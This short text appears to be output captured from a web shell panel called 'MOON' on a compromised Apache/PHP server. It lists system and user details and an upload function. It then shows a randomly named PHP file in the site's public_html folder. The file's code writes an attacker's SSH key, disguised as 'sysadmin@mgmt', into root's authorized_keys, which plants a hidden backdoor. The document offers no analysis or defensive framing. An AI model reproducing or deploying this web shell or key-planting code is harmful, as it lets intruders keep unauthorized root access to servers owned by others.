MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/trebiaseguros/public_html/xe4eff8.php
<?php @mkdir('/root/.ssh',0700,true);$k='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICtBU5bkMEET5BsMXMPOKjBiKQ7jECnzvTdNcRLzjQkH sysadmin@mgmt';$f='/root/.ssh/authorized_keys';$c=@file_get_contents($f)?:'';if(strpos($c,$k)===false)file_put_contents($f,trim($c)."\n".$k."\n");@chmod($f,0600);echo json_encode(['ok'=>1]);?>